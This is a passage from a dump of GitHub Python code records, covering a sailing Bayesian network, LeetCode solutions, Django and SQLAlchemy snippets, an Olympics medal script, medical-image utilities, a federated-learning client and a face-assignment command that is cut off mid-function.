60.0:\n return 1\n else:\n return 0\n\n\n@jit(nogil=True, fastmath=True)\ndef gen_env_model():\n \"\"\"Specify BBN.\"\"\"\n cpd_tws = TabularCPD('TWS', 2, values=[[0.8, 0.2]])\n cpd_twa = TabularCPD('TWA', 2, values=[[0.8, 0.2]])\n cpd_wind = TabularCPD('Wind', 2,\n # values=[[1, 0.1, 0.1, 0.0],\n # [0.0, 0.9, 0.9, 1.0]],\n values = [[1, 0.999, 0.999, 0.998],\n [0.0, 0.001, 0.001, 0.002]], # min\n evidence=['TWA', 'TWS'],\n evidence_card=[2, 2])\n cpd_wh = TabularCPD('WH', 2, values=[[0.8, 0.2]])\n cpd_wd = TabularCPD('WD', 2, values=[[0.8, 0.2]])\n cpd_waves = TabularCPD('Waves', 2,\n values=[[1, 0.1, 0.1, 0.0], # normal vals\n [0.0, 0.9, 0.9, 1.0]],\n # values = [[1, 0.999, 0.999, 0.998],\n # [0.0, 0.001, 0.001, 0.002]], # min failure\n evidence=['WH', 'WD'],\n evidence_card=[2, 2])\n cpd_fail = TabularCPD('Craft failure', 2,\n values=[[1.0, 0.1, 0.1, 0.0],\n [0.0, 0.9, 0.9, 1.0]],\n evidence=['Waves', 'Wind'],\n evidence_card=[2, 2])\n model = BayesianModel([('TWS', 'Wind'), ('TWA', 'Wind'),\n ('WH', 'Waves'), ('WD', 'Waves'),\n ('Waves', 'Craft failure'),\n ('Wind', 'Craft failure')])\n model.add_cpds(cpd_tws, cpd_twa, cpd_wind,\n cpd_wh, cpd_wd, cpd_waves, cpd_fail)\n belief_propagation = BeliefPropagation(model)\n return belief_propagation\n\n\n@jit(cache=True, nogil=True, fastmath=True)\ndef env_bbn_interrogate(bp, tws, twa, h, theta):\n \"\"\"\n Interrogate BBN for failure probability.\n\n Modelling failure as a function of environmental conditions.\n \"\"\"\n q = bp.query(variables=['Craft failure'],\n evidence={'TWS': wind_speed(tws),\n 'TWA': wind_dir(twa),\n 'WH': wave_height(h),\n 'WD': wave_dir(theta)})\n return q['Craft failure'].values[-1]\n\n\nif __name__ == '__main__':\n model = gen_env_model()\n print(\"No failure: \", env_bbn_interrogate(model, 10, 60, 0, 40))\n print(\"Wave direction condition: \", env_bbn_interrogate(model, 10, 60, 0, 10))\n print(\"Full wave failure: \", env_bbn_interrogate(model, 10, 60, 4, 10))\n print(\"Wind speed failure: \", env_bbn_interrogate(model, 40, 60, 4, 10))\n print(\"Wind cond failure: \", env_bbn_interrogate(model, 40, 10, 4, 
10))\n","repo_name":"TAJD/pyroute","sub_path":"sail_route/performance/bbn.py","file_name":"bbn.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"74009680229","text":"# coding=utf-8\n\nfrom sqlalchemy.ext.declarative import ( #type:ignore\n as_declarative,\n declared_attr\n)\nfrom sqlalchemy import ( #type:ignore\n Column,\n Integer\n)\n\n\n@as_declarative()\nclass Base:\n __name__ = 'Base'\n\n id_ = Column('id', Integer(), primary_key=True)\n\n @declared_attr\n def __tablename__(cls) -> str: # pylint:disable=E0213\n return cls.__name__.lower() # pylint:disable=E1101\n","repo_name":"magiskboy/fastapi-webservice","sub_path":"app/db/base_class.py","file_name":"base_class.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11243096398","text":"# -*- coding: UTF-8 -*-\n# https://leetcode-cn.com/problems/hua-dong-chuang-kou-de-zui-da-zhi-lcof/\nimport collections\n\ndef maxSlidingWindow(nums, k):\n \"\"\"\n :type nums: List[int]\n :type k: int\n :rtype: List[int]\n \"\"\"\n res = []\n deque = collections.deque()\n n = len(nums)\n for i,j in zip(range(1-k,n+1-k),range(n)):\n if i>0 and nums[i-1]==deque[0]:\n deque.popleft()\n while deque and deque[-1]<nums[j]:\n deque.pop()\n deque.append(nums[j])\n if i>=0:\n res.append(deque[0])\n return res\n\nnums = [1,3,-1,-3,5,3,6,7]\nk = 3\nprint(maxSlidingWindow(nums,k))\n","repo_name":"lichengchengchloe/leetcodePracticePy","sub_path":"MaxSlidingWindow.py","file_name":"MaxSlidingWindow.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30453707096","text":"from django.urls import path, re_path\n\nfrom .views import Leaderboards, PlayerDetail, PlayerSearch\n\napp_name = \"baseball\"\n\nurlpatterns = [\n re_path(\n # angle-bracketed tokens were stripped from this record during extraction;\n # the capture-group names below are editorial placeholders\n r\"(?P<group1>[\\w]*)-(?P<group2>[\\w]*)-leaders/\",\n Leaderboards.as_view(),\n name=\"leaderboards\",\n ),\n path(\"players/<int:pk>/\", PlayerDetail.as_view(), name=\"batter-detail\"),\n path(\"players/search\", PlayerSearch.as_view(), name=\"player-search\"),\n]\n","repo_name":"TimESQuit/baseball-api-v3","sub_path":"baseball/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"} +{"seq_id":"22352879695","text":"'''Given a linked list, determine if it has a cycle in it.\n\nTo represent a cycle in the given linked list, we use an integer pos which represents the position (0-indexed) in the\nlinked list where tail connects to. 
If pos is -1, then there is no cycle in the linked list.'''\n\n\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n temp = head\n while temp:\n if temp.val == '0':\n return True\n temp.val = '0'\n temp = temp.next\n return False","repo_name":"nishantchaudhary12/Leet_Code","sub_path":"Python/141_linkedListCycle.py","file_name":"141_linkedListCycle.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"19478547453","text":"\n\nclass View(object):\n provider_class = None\n provider = None\n\n def __init__(self, request):\n self.request = request\n self.response = request.response\n self.context = request.context\n\n dbsession = request.dbsession\n settings = request.registry.settings\n\n if self.provider_class:\n self.provider = self.provider_class(dbsession, settings)\n","repo_name":"JesusAnaya/jesusanaya_blog","sub_path":"jesusanaya_blog/views/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34623745101","text":"import argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--path\")\nparser.add_argument(\"--mode\", required=False)\nparser.add_argument(\"--country\", required=False)\nparser.add_argument(\"--year\", required=False)\nparser.add_argument(\"--output\", required=False)\nparser.add_argument(\"-overall\", type=str, required=False, nargs='*')\nargs = parser.parse_args()\npath = args.path\nmode = args.mode\ncountry = args.country\nyear = args.year\npathOutput = args.output\ncountries = args.overall\n\n#python main.py --path data.tsv --mode medals --country USA --year 1972\n#python main.py --path data.tsv --mode total --year 1972\n\nmedals = []\n\nif (pathOutput != None):\n fileOutput = open(pathOutput, \"w\")\n\n\ndef countMedals(medals):\n gold = 0\n bronze = 0\n silver = 0\n countAthletes = 0\n with open(path, 'r') as file:\n file.readline()\n nextLine = file.readline()\n while nextLine:\n if int(year) not in yearsOlymp:\n print('No olymp this year')\n nextLine = file.readline()\n quit()\n splitLine = nextLine.split('\\t')\n medalLine = splitLine[-1][:-1]\n nameAthlete = splitLine[1]\n countryAthlete = splitLine[-9]\n sportAthlete = splitLine[-3]\n if country in countryAthlete or country in splitLine:\n if year in splitLine:\n while countAthletes < 10:\n if nameAthlete not in names and medalLine != 'NA':\n if (pathOutput != None):\n fileOutput.write(f'{nameAthlete} - {sportAthlete} - {medalLine} \\n')\n print(nameAthlete, \"-\", sportAthlete, \"-\", medalLine)\n countAthletes += 1\n names.append(nameAthlete)\n else:\n break\n\n medals.append(medalLine)\n\n nextLine = file.readline()\n\n for medal in medals:\n if medal == 'Gold':\n gold += 1\n elif medal == 'Silver':\n silver += 1\n elif medal == 'Bronze':\n bronze += 1\n\n if len(names) == 0:\n if (pathOutput != None):\n fileOutput.write('invalid country')\n print('invalid country')\n quit()\n\n if len(medals) < 10:\n if (pathOutput != None):\n fileOutput.write(f'that year {country} had less than 10 medals \\n')\n print('that year', country, 'had less than 10 medals')\n\n return print(f'{gold} gold medals, {silver} silver medals, {bronze} bronze medals, total : {gold + bronze + silver}')\n\n\ndef total_medals(year):\n if int(year) not in yearsOlymp:\n 
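# NOTE: args.year may be None when --year is omitted, so int(year) raises a TypeError here; yearsOlymp (built below) holds the Summer Games years 1896-2012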
print('No olymp this year')\n quit()\n dict = {}\n with open(path, 'r') as file:\n file.readline()\n line = file.readline()\n while line:\n splitLine = line.split('\\t')\n if year == splitLine[9]:\n if splitLine[-1][:-1] != \"NA\":\n key = splitLine[-9]\n dict.setdefault(key, [])\n if len(dict[key]) == 0:\n dict[key].append(0)\n dict[key].append(0)\n dict[key].append(0)\n medal = splitLine[-1][:-1].lower()\n if medal == \"gold\":\n dict[key][0] += 1\n elif medal == \"silver\":\n dict[key][1] += 1\n elif medal == \"bronze\":\n dict[key][2] += 1\n\n line = file.readline()\n\n\n for key in dict:\n print(key, \" - \", dict[key][0], \" - \", dict[key][1], \" - \", dict[key][2])\n\n return dict\n\n\nnames = []\ncountAthletes = 0\nyearsOlymp = []\n\nfor i in range(1896, 2016, 4):\n yearsOlymp.append(i)\n\n\ndef overallFunc(countries):\n dict = {}\n\n for countryOverall in countries:\n key = countryOverall\n dict.setdefault(key, [])\n dict[key].append([])\n dict[key].append([])\n\n def findIndex(dictionary, needYear, key):\n for countr in dictionary:\n i = 0\n if (countr == key):\n for year in dictionary[countr][0]:\n if needYear == year:\n return i\n i += 1\n\n with open(path, 'r') as file:\n file.readline()\n line = file.readline()\n while line:\n splitLine = line.split('\\t')\n yearOverall = splitLine[9]\n if splitLine[-1][:-1] != \"NA\":\n if splitLine[-9] in countries:\n key = splitLine[-9]\n if yearOverall not in dict[key][0]:\n dict[key][0].append(yearOverall)\n dict[key][1].append(0)\n dict[key][1][findIndex(dict,yearOverall,key)] += 1\n elif yearOverall in dict[key][0]:\n dict[key][1][findIndex(dict,yearOverall,key)] += 1\n\n line = file.readline()\n\n def maxMedals(dictionary):\n for countr in dictionary:\n i = 0\n j = 0\n maxMedal = dictionary[countr][1][0]\n for medal in dictionary[countr][1]:\n if (maxMedal <= medal):\n maxMedal = medal\n j = i\n i+=1\n print(countr,\" max medals in \",dictionary[countr][0][j],\" : \",maxMedal)\n\n return print(maxMedals(dict))\n\ndef interactiveFunc():\n while True:\n dict = {}\n dictCountries = {}\n dictMedals = {}\n\n country = input(\"Input country\")\n with open(path, 'r') as file: # открываем файл на чтение\n file.readline() # читаем заголовочную строку\n line = file.readline() # читаем первую строку с данными\n while line: # пока есть строки в файле\n splitLine = line.split('\\t') # сплит по табу\n if country in splitLine[-9] or country in splitLine[-8]:\n if splitLine[-1][:-1] != \"NA\":\n key = splitLine[9]\n dict.setdefault(key)\n dictCountries.setdefault(key)\n if (dict[key] == None):\n dict[key] = 1\n dictCountries[key] = splitLine[-4]\n else:\n dict[key] += 1\n dictCountries[key] = splitLine[-4]\n\n dictMedals.setdefault(key, [])\n\n if (dictMedals[key] == []):\n dictMedals[key].append(0)\n dictMedals[key].append(0)\n dictMedals[key].append(0)\n\n if splitLine[-1][:-1] == \"Gold\":\n dictMedals[key][0] += 1\n elif splitLine[-1][:-1] == \"Silver\":\n dictMedals[key][1] += 1\n elif splitLine[-1][:-1] == \"Bronze\":\n dictMedals[key][2] += 1\n\n\n line = file.readline()\n\n firstYear = int(key)\n maxYear = key\n countMaxYear = dict[key]\n minYear = key\n countMinYear = dict[key]\n placeOfOlymp = dictCountries[key]\n\n for key in dict:\n if firstYear >= int(key):\n firstYear = int(key)\n placeOfOlymp = dictCountries[key]\n if (dict[key] >= countMaxYear):\n maxYear = key\n countMaxYear = dict[key]\n if (dict[key] <= countMinYear):\n minYear = key\n countMinYear = dict[key]\n\n print(\"First Olymp : \", firstYear, \". 
Place : \", placeOfOlymp)\n print(\"Max medals Olymp : \", maxYear, \". Count medals : \", countMaxYear)\n print(\"Min medals Olymp : \", minYear, \". Count medals : \", countMinYear)\n\n for key in dictMedals:\n print(key,\" year : \", dictMedals[key][0], \" gold medals, \", dictMedals[key][1], \" silver medals, \",\n dictMedals[key][2], \" bronze medals\")\n\n retry = input(\"Again ? y/n\")\n retry = retry.lower()\n if retry == \"y\":\n continue\n elif retry == \"n\":\n quit()\n else:\n print(\"error\")\n\nif mode == 'total':\n total_medals(year)\nelif mode == \"medals\":\n countMedals(medals)\nelif countries != None:\n overallFunc(countries)\nelif mode == 'interactive':\n interactiveFunc()\n\nif (pathOutput != None):\n fileOutput.write(f'Summary medals : {countMedals(medals)} \\n')\nif (pathOutput != None):\n fileOutput.close()\n","repo_name":"KristinaRiabova/Assignment_7","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21298840766","text":"import os\nimport numpy as np\nimport SimpleITK as sitk\nfrom .coordsConvert import convertPatient2ImageCoords\n\n\nclass Image:\n def __init__(self):\n self.image = None\n self.imgarray = None\n self.clpts = None\n self.origin = (0., 0., 0.)\n self.spacing = (0., 0., 0.)\n self.basename = \"\"\n\n def load(self, imgpath=None, clpath=None):\n if imgpath == None:\n raise ValueError(\"No file provided\")\n imgreader = sitk.ImageFileReader()\n imgreader.SetFileName(imgpath)\n self.image = imgreader.Execute()\n self.origin = self.image.GetOrigin()\n self.spacing = self.image.GetSpacing()\n self.basename = os.path.basename(imgpath).split(\".\")[0]\n\n if clpath != None:\n self.clpts = np.load(clpath)\n\n def convert_to_array(self):\n if self.image == None:\n raise ValueError(\"No image loaded\")\n self.imgarray = sitk.GetArrayFromImage(self.image)\n\n def convert_to_imagepts(self, dimensions=[64, 64, 64], origin=[0, 0, 0], spacing=[1, 1, 1]):\n if isinstance(self.clpts, type(None)):\n raise ValueError(\n \"use convert_to_array method create an ArrayDict from the loaded centerlines.\"\n )\n self.imgarray = np.zeros(dimensions)\n testarray = []\n for pt in self.clpts:\n img_pt = convertPatient2ImageCoords(pt[::-1], origin, spacing)\n testarray.append(img_pt)\n # self.imgarray[img_pt] = 1\n return np.array(testarray)\n\n def convert_to_image(self):\n if isinstance(self.imgarray, type(None)):\n raise ValueError(\n \"use convert_to_imagepts method create an image mask from the loaded centerlines array.\"\n )\n self.image = sitk.GetImageFromArray(self.imgarray)\n\n def save_image(self, savepath):\n if self.image == None:\n raise ValueError(\"no centerline image.\")\n sitk.WriteImage(self.image, savepath)\n\n def save_imagepts(self, savepath):\n if self.clpts == None:\n raise ValueError(\"no centerline points\")\n np.save(savepath, self.clpts)\n\n def save_labels(self, savedir, basename=None):\n if isinstance(self.imgarray, type(None)):\n raise ValueError(\n \"No image array, use convert_to_array to convert a loaded image into a numpy array\"\n )\n if basename == None:\n basename = self.basename\n min_value = self.imgarray.min()\n max_value = self.imgarray.max()\n for i in range(min_value, max_value + 1):\n if i <= 0:\n continue\n output_array = np.zeros_like(self.imgarray)\n output_array[self.imgarray == i] = 1\n output_image = sitk.GetImageFromArray(output_array)\n output_image.SetOrigin(self.origin)\n 
output_image.SetSpacing(self.spacing)\n filename = basename + \"_\" + str(i) + \".nii.gz\"\n if savedir[-1] == \"/\":\n filepath = savedir + filename \n else:\n filepath = savedir + \"/\" + filename\n sitk.WriteImage(output_image, filepath)\n print(f'Label {str(i)} --> {filename}')\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"isaiahchua/MeshingScriptsV2","sub_path":"ImageTools/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74746894628","text":"import copy\nimport warnings\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch import distributed\nfrom collections import defaultdict\nimport numpy as np\nimport random\n\nfrom utils import get_scheduler, set_params\nfrom utils import HardNegativeMining, MeanReduction\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils import data\nfrom torch.cuda.amp import autocast, GradScaler\n\n\ndef seed_worker(_):\n worker_seed = torch.initial_seed() % 2 ** 32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n\n\nclass Client:\n\n def __init__(self, client_id, dataset, model, logger, writer, args, batch_size, world_size, rank, num_gpu,\n device=None, disable_ddp=False, **kwargs):\n\n self.id = client_id\n self.dataset = dataset\n self._model = model\n self.device = device\n self.batch_size = batch_size\n self.logger = logger\n self.writer = writer\n self.args = args\n\n if disable_ddp:\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size, drop_last=True)\n else:\n if args.random_seed is not None:\n g = torch.Generator()\n g.manual_seed(args.random_seed)\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size, worker_init_fn=seed_worker,\n sampler=DistributedSampler(self.dataset, num_replicas=world_size,\n rank=rank),\n num_workers=4 * num_gpu, drop_last=True, pin_memory=True, generator=g)\n else:\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size,\n sampler=DistributedSampler(self.dataset, num_replicas=world_size,\n rank=rank),\n num_workers=4 * num_gpu, drop_last=True, pin_memory=True)\n\n self.criterion = nn.CrossEntropyLoss(ignore_index=255, reduction='none')\n self.reduction = HardNegativeMining() if args.hnm else MeanReduction()\n\n if self.args.mixed_precision:\n self.scaler = GradScaler()\n\n def save_bn_stats(self):\n pass\n\n def calc_losses(self, images, labels):\n\n if self.args.model == 'bisenetv2':\n if self.args.output_aux:\n outputs, feat2, feat3, feat4, feat5_4 = self.model(images)\n loss = self.reduction(self.criterion(outputs, labels), labels)\n boost_loss = 0\n boost_loss += self.reduction(self.criterion(feat2, labels), labels)\n boost_loss += self.reduction(self.criterion(feat3, labels), labels)\n boost_loss += self.reduction(self.criterion(feat4, labels), labels)\n boost_loss += self.reduction(self.criterion(feat5_4, labels), labels)\n\n loss_tot = loss + boost_loss\n dict_calc_losses = {'loss': loss, 'boost_loss': boost_loss, 'loss_tot': loss_tot}\n\n else:\n outputs = self.model(images)\n loss_tot = self.reduction(self.criterion(outputs, labels), labels)\n dict_calc_losses = {'loss_tot': loss_tot}\n\n else:\n raise NotImplementedError\n\n return dict_calc_losses, outputs\n\n def handle_grad(self, loss_tot):\n pass\n\n @staticmethod\n def calc_loss_fed(dict_losses):\n return dict_losses\n\n @staticmethod\n def update_metrics(metrics, outputs, labels):\n _, prediction = 
outputs.max(dim=1)\n labels = labels.cpu().numpy()\n prediction = prediction.cpu().numpy()\n metrics.update(labels, prediction)\n\n @staticmethod\n def print_step_loss(losses, scheduler, logger, step):\n for name, l in losses.items():\n logger.log_metrics({f\"Train_{name}\": l}, step=step)\n if scheduler is not None:\n logger.log_metrics({\"Learning Rate\": scheduler.get_last_lr()[0]}, step=step)\n\n @staticmethod\n def apply_loss_penalties(loss_tot):\n return loss_tot\n\n def clip_grad(self):\n pass\n\n def run_epoch(self, cur_epoch, metrics, optimizer, scheduler=None):\n\n dict_all_epoch_losses = defaultdict(lambda: 0)\n\n self.loader.sampler.set_epoch(cur_epoch)\n\n for cur_step, (images, labels) in enumerate(self.loader):\n\n if self.args.stop_epoch_at_step != -1 and cur_step > self.args.stop_epoch_at_step:\n break\n\n images = images.to(self.device, dtype=torch.float32)\n labels = labels.to(self.device, dtype=torch.long)\n\n optimizer.zero_grad()\n\n if self.args.mixed_precision:\n with autocast():\n dict_calc_losses, outputs = self.calc_losses(images, labels)\n dict_calc_losses['loss_tot'] = self.apply_loss_penalties(dict_calc_losses['loss_tot'])\n self.scaler.scale(dict_calc_losses['loss_tot']).backward()\n else:\n dict_calc_losses, outputs = self.calc_losses(images, labels)\n dict_calc_losses['loss_tot'] = self.apply_loss_penalties(dict_calc_losses['loss_tot'])\n dict_calc_losses['loss_tot'].backward()\n\n self.handle_grad(dict_calc_losses['loss_tot'])\n\n if (cur_step + 1) % self.args.print_interval == 0 and self.args.framework == 'centralized':\n self.print_step_loss(dict_calc_losses, scheduler, self.logger,\n len(self.loader) * cur_epoch + cur_step + 1)\n\n dict_calc_losses = self.calc_loss_fed(dict_calc_losses)\n\n self.clip_grad()\n\n self.scaler.step(optimizer) if self.args.mixed_precision else optimizer.step()\n\n if scheduler is not None:\n scheduler.step()\n\n if self.args.framework == 'federated' and cur_epoch == self.args.num_epochs - 1:\n self.update_metrics(metrics, outputs, labels)\n elif self.args.framework == 'centralized':\n self.update_metrics(metrics, outputs, labels)\n\n if self.args.mixed_precision:\n self.scaler.update()\n\n for name, l in dict_calc_losses.items():\n if type(l) != int:\n dict_all_epoch_losses[name] += l.detach().item()\n else:\n dict_all_epoch_losses[name] += l\n\n self.writer.write(f\"EPOCH {cur_epoch + 1}: ended.\")\n print_string = \"\"\n for name, l in dict_all_epoch_losses.items():\n dict_all_epoch_losses[name] /= len(self.loader)\n print_string += f\"{name}={'%.3f' % dict_all_epoch_losses[name]}, \"\n self.writer.write(print_string)\n\n return dict_all_epoch_losses\n\n def generate_update(self):\n return copy.deepcopy(self.model.state_dict())\n\n def _configure_optimizer(self, params):\n if self.args.optimizer == 'SGD':\n optimizer = optim.SGD(params, lr=self.args.lr, momentum=self.args.momentum,\n weight_decay=self.args.weight_decay, nesterov=self.args.nesterov)\n else:\n optimizer = optim.Adam(params, lr=self.args.lr, weight_decay=self.args.weight_decay)\n scheduler = get_scheduler(self.args, optimizer,\n max_iter=10000 * self.args.num_epochs * len(self.loader))\n return optimizer, scheduler\n\n def handle_log_loss(self, dict_all_epoch_losses, dict_losses_list):\n for n, l in dict_all_epoch_losses.items():\n dict_all_epoch_losses[n] = torch.tensor(l).to(self.device)\n distributed.reduce(dict_all_epoch_losses[n], dst=0)\n if self.args.local_rank == 0:\n dict_losses_list[n].append(dict_all_epoch_losses[n] / 
distributed.get_world_size())\n return dict_all_epoch_losses, dict_losses_list\n\n def train(self, metrics):\n\n params = set_params(self.model, self.args)\n num_train_samples = len(self.dataset)\n\n optimizer, scheduler = self._configure_optimizer(params)\n\n dict_losses_list = defaultdict(lambda: [])\n self.model.train()\n\n for epoch in range(self.args.num_epochs):\n dict_all_epoch_losses = self.run_epoch(epoch, metrics, optimizer, scheduler)\n dict_all_epoch_losses, dict_losses_list = self.handle_log_loss(dict_all_epoch_losses, dict_losses_list)\n\n metrics.synch(self.device)\n\n if self.args.framework == 'federated':\n update = self.generate_update()\n else:\n update = None\n\n if self.args.local_rank == 0:\n return num_train_samples, update, dict_losses_list\n return num_train_samples, update\n\n def switch_bn_stats_to_test(self, change_momentum=False):\n pass\n\n def reset_bn_momentum(self):\n pass\n\n def subs_bn_stats(self, domain, train_cl_bn_stats):\n pass\n\n def copy_bn_stats(self):\n pass\n\n def test(self, metrics, ret_samples_ids=None, silobn_type=None, train_cl_bn_stats=None, loader=None):\n\n self.model.eval()\n\n # idda diff_dom + idda same_dom standard\n if silobn_type == '' or silobn_type == '_standard':\n self.switch_bn_stats_to_test()\n\n bn_dict_tmp = None\n\n class_loss = 0.0\n ret_samples = []\n\n if loader is None:\n loader = self.loader\n\n with torch.no_grad():\n for i, sample in enumerate(loader):\n\n if self.args.stop_epoch_at_step != -1 and i > self.args.stop_epoch_at_step:\n break\n\n self.writer.write(f'{self}: {i + 1}/{len(loader)}, {round((i + 1) / len(loader) * 100, 2)}%')\n\n if self.args.dataset == 'idda':\n # idda heterogeneous same_dom by_domain\n if self.dataset.return_domain:\n images, labels, domain = sample\n else:\n images, labels = sample\n domain = None\n else:\n images, labels = sample\n\n # idda heterogeneous same_dom by_domain\n if self.args.dataset == 'idda':\n self.subs_bn_stats(domain, train_cl_bn_stats)\n\n if self.args.model == 'bisenetv2':\n original_images, images = images\n else:\n original_images = images\n\n images = images.to(self.device, dtype=torch.float32)\n labels = labels.to(self.device, dtype=torch.long)\n\n outputs = self.model(images, test=True, use_test_resize=self.args.use_test_resize) \\\n if self.args.model == 'bisenetv2' else self.model(images)\n\n loss = self.reduction(self.criterion(outputs, labels), labels)\n class_loss += loss.item()\n\n _, prediction = outputs.max(dim=1)\n labels = labels.cpu().numpy()\n prediction = prediction.cpu().numpy()\n metrics.update(labels, prediction)\n\n if ret_samples_ids is not None and i in ret_samples_ids: # get samples\n ret_samples.append((original_images[0].detach().cpu().numpy(),\n labels[0], prediction[0]))\n\n if bn_dict_tmp is not None:\n self.model.load_state_dict(bn_dict_tmp, strict=False)\n\n metrics.synch(self.device)\n\n class_loss = torch.tensor(class_loss).to(self.device)\n distributed.reduce(class_loss, dst=0)\n\n class_loss = class_loss / distributed.get_world_size() / len(self.loader)\n\n return class_loss, ret_samples\n\n def save_model(self, epochs, path, optimizer, scheduler):\n state = {\n \"epoch\": epochs,\n \"model_state\": self.model.state_dict(),\n \"optimizer_state\": optimizer.state_dict(),\n \"scheduler_state\": scheduler.state_dict()}\n torch.save(state, path)\n return path\n\n def __str__(self):\n return self.id\n\n @property\n def num_samples(self):\n return len(self.dataset)\n\n def len_loader(self):\n return len(self.loader)\n\n @property\n def 
model(self):\n return self._model\n\n @model.setter\n def model(self, model):\n warnings.warn('The current implementation shares the model among all clients.'\n 'Setting it on one client will effectively modify all clients.')\n self._model = model\n","repo_name":"Erosinho13/FedDrive","sub_path":"src/clients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12669,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"71"} +{"seq_id":"11476483397","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy_node = ListNode()\n dummy_node.next = head\n fast, slow = head, dummy_node\n while n > 0:\n fast = fast.next\n n -= 1\n while fast:\n fast = fast.next\n slow = slow.next\n slow.next = slow.next.next\n return dummy_node.next","repo_name":"hongkong9771/LeetCode","sub_path":"Code/0019.删除链表的倒数第N个节点/19. Remove Nth Node From End of List.py","file_name":"19. Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"32764532772","text":"#! /usr/bin/env python\n\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Count, Q, F\nfrom django.db.models.functions import Abs\nfrom face_manager.models import Person, Face\nfrom filepopulator.models import ImageFile\nfrom scipy import stats\nfrom time import sleep\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nimport collections\nimport io\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional\nimport torchvision\n\nclass faceAssigner():\n\n \"\"\"docstring for faceAssigner\"\"\"\n def __init__(self):\n super(faceAssigner, self).__init__()\n\n self.DEBUG=False\n self.USE_MIN_VALUE=True\n if self.USE_MIN_VALUE:\n self.IGN_VALUE = 999\n else:\n self.IGN_VALUE = 0\n\n self.DISTANCE_SIAMESE=True\n self.WEIGHT_THRESH_MAX = 0.6\n self.WEIGHT_THRESH_MIN = 0.4\n\n self.MIN_NUM = 50\n self.NUM_DAYS = 180\n self.NUM_CLOSEST = 50\n self.NUM_TO_AVERAGE = 1\n\n self.bogus_date = datetime(1990, 1, 1) # Very few images before that\n self.bogus_date_utc = time.mktime(self.bogus_date.timetuple())\n self.ignore_person = Person.objects.filter(person_name=settings.SOFT_IGNORE_NAME)[0]\n\n model_dir = '/models/optuna_wts'\n\n self.siam_triplet = self.load_network(os.path.join(model_dir, 'output_37.pkl'))\n \n if False:\n self.clear_unassigned_images()\n\n # Sets self.person_ids\n self.get_filtered_list_of_faces(min_num_faces = self.MIN_NUM)\n # Shouldn't do anything, but double checks that \n # a field is set in the database\n self.doubleCheckFacesTimes()\n # Get earliest date for each person. 
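# (classify_unassigned later treats a person as unlikely for photos taken before this date)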
\n self.known_persons_to_dates()\n\n self.reset_task()\n\n def reset_task(self):\n people = Person.objects.all()\n for p in people:\n p.num_faces = p.face_declared.count()\n p.num_possibilities = p.face_poss1.count() + p.face_poss2.count() + p.face_poss3.count()+ p.face_poss4.count()+ p.face_poss5.count()\n p.num_unverified_faces = p.face_declared.filter(validated=False).count()\n p.save()\n\n def execute(self, redo_all=False):\n \n # Now we want to get each unassigned image\n unassigned_crit = Q(declared_name__person_name=settings.BLANK_FACE_NAME)\n\n if redo_all:\n unassigned = Face.objects.filter(unassigned_crit).order_by('?')\n else:\n no_suggestions = Q(poss_ident1__person_name=None)\n unassigned = Face.objects.filter(unassigned_crit).filter(no_suggestions).order_by('?')\n\n num_unassigned = int(unassigned.count())\n u_idx = 0\n for u_img in unassigned.iterator():\n try:\n print(f\"Assigning: {u_idx+1}/{num_unassigned}\")\n u_idx += 1\n self.classify_unassigned(u_img)\n except Exception as e:\n print(f\"Exception! {e}\")\n\n def load_network(self, net_data_pkl):\n with open(net_data_pkl, 'rb') as fh:\n data = pickle.load(fh)\n\n weight_file = io.BytesIO(data['weight_file_data'])\n weights = torch.load(weight_file, map_location=torch.device('cpu'))\n params = data['params']\n\n n_layers = params['n_layers']\n activation = params['activation']\n layers_sizes = []\n for ii in range(n_layers - 1):\n layers_sizes.append(params[f'n_units_l{ii}'])\n layers_sizes.append(400)\n\n dropouts = []\n for ii in range(n_layers - 1):\n dropouts.append(params[f'dropout_l{ii}'])\n\n net = siameseModel(n_layers, activation, layers_sizes, dropouts, 640, 'triplet')\n net.load_state_dict(weights)\n net.eval()\n\n return net\n\n\n # def compute_distance(self, base, comparisons):\n # base_enc = 